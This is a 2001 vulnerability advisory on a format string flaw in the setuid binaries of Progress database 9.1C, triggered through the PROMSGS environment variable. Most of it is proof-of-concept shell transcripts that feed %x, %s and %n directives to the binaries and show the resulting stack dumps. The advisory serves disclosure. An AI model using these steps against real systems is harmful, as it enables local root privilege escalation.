Format string vulnerability in PROMSGS in the Progress database

Published: 2001-11-03
Updated: 2001-11-03
Severity: High
Threat: Local administrator (root) privileges
Error type: Input validation error
Exploitation: Server mode

Affected systems

PROGRESS Version 9.1C

Detailed description

The setuid binaries shipped in the Progress dlc/bin directory locate their message catalogue through the PROMSGS environment variable, which any local user can point at a file of their choosing. Message text read from that file is passed to the formatting routine as the format string, so directives placed in the file are interpreted: %x dumps words from the stack and %n writes to memory, as the transcript below shows. A local attacker can use this to corrupt the stack, overwrite a return address and gain the privileges of the setuid binary.

Test code

[elguapo@linux bin]$ echo blah > file
[elguapo@linux bin]$ export PROMSGS=./file
[elguapo@linux bin]$ ./_probuild
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 290
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 96
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 24
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

Test to make sure they fixed my original hole with the buffer overflows. (looks fine)

[elguapo@linux bin]$ echo `perl -e 'print "A" x 20000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

Well, if you use a format string instead of an A we get much better results.

[elguapo@linux bin]$ echo `perl -e 'print "%x" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x80618450x00x83e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5f2c0x10000x401e44a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x83e3ec00xbffff5440x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff56d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

[elguapo@linux bin]$ echo `perl -e 'print "%s" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
Error formatting messaage 49. Message file is corrupt.
rcurctr overflow reading promsgs file.

(note the overflow msg)

[elguapo@linux bin]$ echo `perl -e 'print "%n" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96. Message file is corrupt.
0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-68928197281972819728197281972819728197-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)24364409617568-2456-3395409624364-2280-3414%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
-2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)128578246822421057139041978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)160645512138-2643146-2707%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

I am sure you get the idea... ALL suids in the dlc/bin dir are affected.

[elguapo@linux bin]$ ./_dbutil
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x81159280xbffff77c0x00x00x805ec350x11cdf40x00xbffffd530x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff7250xbffff72c0x80543750x00x81222a00x81222a00x81161c00x900x81159280xbffff77c0x00x00x40015b980x7c304040x40012b4b0xbffff7000x40015a400x804bb1b0x00x10x400c4a4c0x400227c8%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
0x80fd96e0x81159280x81271340x00xbffff61c0x806540b0x40x8126fd80x81159280xbffff77c0x00x804daea0x00x81222a00x10x81159280x2080xbffff7480xdff00000x00x00x00x616441740x532f0x00x00xbffff7800x00x4e2069720x2020766f0x333120320x3a33313a0x322031310xa3130300x8000ff000x80b00d0c0x3900ffb00x2043312e0x202020200x20202020%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

[elguapo@linux bin]$ ./_mprosrv
14:03:13 Error formatting messaage 96. Message file is corrupt.
14:03:13 0x00x00x3e0x812f6280xbffff82c0x10x00x3f0xfff5e40x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80582250x00x813e8c00x813e8c00x81300200x900x812f6280xbffff82c0x10x400003d40x400157e00x80x40022c140x80x400c816c0x10x00x400229240xc0b8fae0x400227b8%
14:03:13 errno=0 reading promsgs file, it may have been deleted.
14:03:13 Unable to format message number 940

[elguapo@linux bin]$ ./_mprshut
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x81802500xbffff82c0x10x00x805af750x1858740x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff6a00x80587650x00x819b8c00x819b8c00x8180d800x900x81802500xbffff82c0x10x00x00x00x00x00x00x00x00x00x00x0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940

[elguapo@linux bin]$ ./_proapsv
14:03:33 02 Nov 2001 Error formatting messaage 96. Message file is corrupt.
14:03:33 02 Nov 2001 0x00x00x3e0x842f7f00xbffff8300xbffff82c0x00x80645050x435d140x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff4180x80630150x00x84573200x84573200x84312200x900x842f7f00x00xbffff82c0x40015a400x400154140x40015a400x805527a0xbffff3680x4000d3600x40015b940x40022c900x70x00x180%

[elguapo@linux bin]$ ./_progres
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x840eaf00xbffff82c0x10x00x80646750x414ff40x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7440x80631850x00x842d1200x842d1200x84105000x900x840eaf00xbffff82c0x10xbffff67c0x00x401e5f2c0x10000x401e44a00xbffff6780x4013f2bd0x10000x401e5f2c0xbffff7280x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
0x83bc8ce0x840eaf00x843296c0x00xbffff6340x807b0fb0x40x84328100x840eaf00xbffff82c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5540x842d1200xbffff6d40x83587c30xbffff5540xbffff6140xc00xbffff5540x842d1200xbffff5540x842d1200x840eaf00x00x842d1200x50x2000x8a0xbffff5bd0x920xbffff57d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

[elguapo@linux bin]$ ./_proutil
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x81ae9480xbffff82c0x10x00x80595d50x1b3f340x00xbffffd510x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80580e50x00x81d77200x81d77200x81af4400x900x81ae9480xbffff82c0x10x40015b940x6dcac560x40012b4b0xbffff6f00x40015a400x804cdee0x400c5a4c0x400227c80x400c255c0x400227c80x0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
0x817912e0x81ae9480x81dc5b40x00xbffff6100x806ea1b0x40x81dc4580x81ae9480xbffff82c0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x5148004d0xbffff5300x81d77200xbffff6b00x816cdd30xbffff5300xbffff5f00xc00xbffff5300x81d77200xbffff5300x81d77200x81ae9480x00x81d77200x50x2000x8a0xbffff5990x920xbffff559%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

[elguapo@linux bin]$ ./_rfutil
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x812d0080xbffff82c0x10x00x80586b50x1324740x00xbffffd530x782578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff71c0x80571c50x00x81433e00x81433e00x812d9800x900x812d0080xbffff82c0x10x40015b940x6dcac560x40012b4b0xbffff6ec0x40015a400x804c3a70x400c5a4c0x400227c80x400c255c0x400227c80xbffff67c%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940

[elguapo@linux bin]$ ./prolib
Error formatting messaage 96. Message file is corrupt.
0x00x00x3e0x806c4480x806e4ac0xbffff5fc0x00x00x00x00xbffffd550x782578250x782578250x782578250x782578250x782578250x782578250x782578250x7250xbffff3cc0x804b5590x00x806c4480x806e4ac0x7970x00x806e4ac0x00x00x00x00x00x00x00x00x00x00x00x00x0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 1943

Solution

None available.

Related information

Credit: KF (dotslash@snosoft.com)
Reference: http://archives.neohapsis.com/archives/bugtraq/2001-11/0011.html